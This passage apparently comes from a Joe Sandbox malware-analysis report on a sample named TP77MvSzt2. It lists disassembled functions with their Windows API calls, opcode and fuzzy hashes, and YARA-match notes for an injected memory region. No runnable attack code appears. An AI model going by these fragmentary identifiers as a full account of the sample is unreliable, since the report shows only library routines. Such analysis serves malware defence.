                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 3803302727-0
                                                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                                                  Function 04842878 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 0484288F
                                                                                  • GetLastError.KERNEL32(?,?,?,?,04848850,?,?,?,?,00000000,?,00000000), ref: 0484289E
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048428B4
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048428C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 3803302727-0
                                                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction ID: 3f059d16a1064d004a12001d7568d20de75786a2b08ecf6189f049774a66dfff
                                                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                  • Instruction Fuzzy Hash: B4F0A03490020EBBDF00FFA4CD44EAF3B68AB00655F200B55B614E20A0DA74E604A7A5
                                                                                  Function 04835A8C Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 04835AA8
                                                                                  • __Cnd_signal.LIBCPMT ref: 04835AB4
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 04835AC9
                                                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 04835AD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                  • String ID:
                                                                                  • API String ID: 2059591211-0
                                                                                  • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                  • Instruction ID: 3430433b64a768c38476c880cbe777a0f089e73125d34547465710dfcf7433cf
                                                                                  • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                  • Instruction Fuzzy Hash: 1CF08C72400701ABFB317B28C81975A73A0AF4072EF144E19D596DA9A0CFFAB8459AD3
                                                                                  Function 00412336 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                  • String ID:
                                                                                  • API String ID: 200240550-0
                                                                                  • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                  • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                                                  • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                  • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                                                  Function 0484259D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___crtCreateEventExW.LIBCPMT ref: 048425B3
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,04840DC0), ref: 048425C1
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048425D7
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048425E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                  • String ID:
                                                                                  • API String ID: 200240550-0
                                                                                  • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                  • Instruction ID: 413b2446f0e22bba51b06f96fbda3f1b0aff65b60aae4cf7739e2c8c425d6eaa
                                                                                  • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                  • Instruction Fuzzy Hash: 2DE0D861A0421D39F710B7794C12F7B369C9B00A8AF540E55FF14E10C2FDD8F10041A5
                                                                                  Function 004192E9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                                                  • GetLastError.KERNEL32 ref: 004239B1
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3735082963-0
                                                                                  • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                  • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                                                  • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                  • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                                                  Function 04849550 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04842979: TlsAlloc.KERNEL32(?,04840DC0), ref: 0484297F
                                                                                  • TlsAlloc.KERNEL32(?,04840DC0), ref: 04853C06
                                                                                  • GetLastError.KERNEL32 ref: 04853C18
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04853C2E
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04853C3C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3735082963-0
                                                                                  • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                  • Instruction ID: 394208357308746cb1919aca1dffe4bfc664de643907ca1d9101f400e90190d0
                                                                                  • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                  • Instruction Fuzzy Hash: AEE02B30400319AAE300BBB8AC4856A3664A6003C97100F26BD11D21B0F974F145465E
                                                                                  Function 0041254D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B59,?,?,?,00000000), ref: 00412557
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412566
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3016159387-0
                                                                                  • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                  • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                                                  • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                  • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                                                  Function 048427B4 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,04840DC0,?,?,?,00000000), ref: 048427BE
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 048427CD
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048427E3
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048427F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3016159387-0
                                                                                  • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                  • Instruction ID: 37345d87bd839ac5f09fd262c18b2ca6f7ddc714aaef38e210a3aaf23bbfbe11
                                                                                  • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                  • Instruction Fuzzy Hash: 4DE0807450010DA7D700FBB5DD45EAF73BC6A00A49B600EA5B505E3150DB64F7049775
                                                                                  Function 004126A5 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                  • GetLastError.KERNEL32 ref: 004126BD
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                  • String ID:
                                                                                  • API String ID: 4286982218-0
                                                                                  • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                  • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                                                  • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                  • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                                                  Function 0041276B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                  • String ID:
                                                                                  • API String ID: 1964976909-0
                                                                                  • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                  • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                                                  • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                  • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                                                  Function 048429D2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsSetValue.KERNEL32(?,00000000,04847BF8,00000000,?,?,04840DC0,?,?,?,00000000,?,00000000), ref: 048429DE
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 048429EA
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 04842A00
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842A0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                  • String ID:
                                                                                  • API String ID: 1964976909-0
                                                                                  • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                  • Instruction ID: 6f185b1d0de12dbdff49486449b707b60579b895295a4f8b138b9ee339ad3e3d
                                                                                  • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                  • Instruction Fuzzy Hash: 3BE0863450011D77EB11BFA4DC09FBB3B6CAF00689B504E65B919D10B1DB79E1149699
                                                                                  Function 0484290C Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetThreadPriority.KERNEL32(?,?), ref: 04842918
                                                                                  • GetLastError.KERNEL32 ref: 04842924
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0484293A
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04842948
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                  • String ID:
                                                                                  • API String ID: 4286982218-0
                                                                                  • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                  • Instruction ID: 6de0d3dcc7face87d0f4af909245f8c0d2af66e9c0d400f541d038c70c7ef4d3
                                                                                  • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                  • Instruction Fuzzy Hash: CDE0263010010D77DB11BFB4DC04FBB3BACBB00689B400E66B818D10A0EA75E114866C
                                                                                  Function 00412712 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                  • GetLastError.KERNEL32 ref: 00412725
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3103352999-0
                                                                                  • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                  • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                                                  • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                  • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                                                  Function 04842979 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsAlloc.KERNEL32(?,04840DC0), ref: 0484297F
                                                                                  • GetLastError.KERNEL32 ref: 0484298C
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048429A2
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048429B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                  • String ID:
                                                                                  • API String ID: 3103352999-0
                                                                                  • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                  • Instruction ID: 085ab5a3c3ccc196d0fd6c39432ffa162d1dceca37159ae2d0f70d9ff781e6d8
                                                                                  • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                  • Instruction Fuzzy Hash: 9AE0C23040011A67D714BBB8AC48E7B77687A017AAB600F66F465D20E0EAA8E10842A9
                                                                                  Function 0042F09D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 3213639722-2276729525
                                                                                  • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                  • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                                                  • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                  • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                                                  Function 0043AE89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 0-711371036
                                                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                  • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                  • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                                                  Function 0486B0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0486B34B,?,00000050,?,?,?,?,?), ref: 0486B1CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ACP$OCP
                                                                                  • API String ID: 0-711371036
                                                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                  • Instruction ID: 786532fb1d674fd311a6cd96cf6ad4548e67231b04254cc0c2d0baff393a2e7c
                                                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                  • Instruction Fuzzy Hash: F9216062B40124B6EBA48E549D01B97739AEF44B6DF468E64ED0BD7108FB32F901CB90
                                                                                  Function 00401F26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodersGdipImage$Size
                                                                                  • String ID: image/png
                                                                                  • API String ID: 864223233-2966254431
                                                                                  • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                  • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                                                  • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                  • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                                                  Function 0483F1B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetLastError.KERNEL32(0000000D,?,0483E0CD,0483C8E5,?,?,00000000,?,0483C7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0483C8E5), ref: 0483F236
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1452528299-1785270423
                                                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                  • Instruction ID: fede89241af03d60d60d9f9253ce60b08d044b26c91c49780b4c68e141d30628
                                                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                  • Instruction Fuzzy Hash: 23118E3A70022AEFCF169F64EC4496EBB65FF09B16B004939FB15D6210DB70A8109BE0
                                                                                  Function 0484DB74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04840F85: RtlEnterCriticalSection.NTDLL ref: 04840F86
                                                                                  • List.LIBCONCRT ref: 0484DBCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterListSection
                                                                                  • String ID: +$D$11@
                                                                                  • API String ID: 2909958271-3688954461
                                                                                  • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
